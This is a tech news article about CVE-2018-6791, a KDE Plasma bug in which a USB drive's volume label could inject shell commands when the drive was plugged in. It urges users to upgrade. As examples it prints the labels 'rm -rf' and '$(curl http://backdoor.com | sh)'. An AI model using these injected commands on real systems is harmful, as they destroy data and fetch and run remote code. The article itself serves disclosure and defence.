KDE Plasma Had A Silly But Serious Security Bug

Written by Michael Larabel in KDE on 9 February 2018 at 06:10 AM EST. 33 Comments
KDE
If you are a KDE user and haven't yet upgraded to Plasma 5.12, you may want to do so soon, or one of the recent point releases -- especially if your system is potentially accessible by others to insert rogue flash/memory devices.

Plasma 5 versions prior to 5.12.0 are vulnerable to CVE-2018-6791 which is a vulnerability for arbitrary command execution by way of the removable device notifier.

Flash drives or other USB memory devices using a FAT file-system if using `` or $() within the volume label you could force arbitrary commands to be executed when plugging in the drive.

Rogue actors or pranksters could e.g. create a VFAT volume with a label of `rm -rf` or $(curl http://backdoor.com | sh) or any of a number potential commands and KDE Plasma would end up executing those commands when connected to the system.


It's straightforward to exploit but obviously requires physical access to the system. The issue has been fixed in KDE Plasma 5.12.0 and is being back-ported to older Plasma releases. The CVE was made public yesterday with details via this security advisory.
Related News
About The Author
Michael Larabel

Michael Larabel is the principal author of Phoronix.com and founded the site in 2004 with a focus on enriching the Linux hardware experience. Michael has written more than 20,000 articles covering the state of Linux hardware support, Linux performance, graphics drivers, and other topics. Michael is also the lead developer of the Phoronix Test Suite, Phoromatic, and OpenBenchmarking.org automated benchmarking software. He can be followed via Twitter, LinkedIn, or contacted via MichaelLarabel.com.

Popular News This Week